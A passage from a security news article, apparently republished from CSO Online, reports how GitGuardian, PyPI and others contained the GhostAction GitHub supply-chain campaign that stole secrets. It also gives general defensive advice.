Threat contained within days: GitGuardian’s security team responded quickly after detection, and the FastUUID package was set to read-only by PyPI administrators within minutes. The malicious commit was reverted shortly afterward. GitGuardian notified maintainers of the affected repositories, successfully contacting 573 projects, while also alerting GitHub, npm, and PyPI security teams to monitor for abuse.Although no malicious packages have yet been published to official registries, GitGuardian reported that some packages are potentially still at risk. “From our initial investigations, so far, 9 npm and 15 PyPI packages are at risk of compromise in the next hours or days,” the researchers said.The blog shared a list of indicators of compromise, including network and GitHub Workflow indicators. For additional protection, the researchers emphasized the importance of reviewing repository workflows, rotating exposed credentials, and adopting stricter controls for GitHub Actions to prevent similar incidents in the future. Package ecosystems like npm and PyPI remain frequent targets due to their popularity and broad reach within the developer community. Beyond publishing malicious packages directly, like the recent npm reconnaissance campaign, attackers have also employed techniques such as typosquatting-creating look-alike packagesor even exploiting AI-hallucinated dependencies to trick developers into installing compromised code.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4052826/ghostaction-campaign-steals-3325-secrets-in-github-supply-chain-attack.html
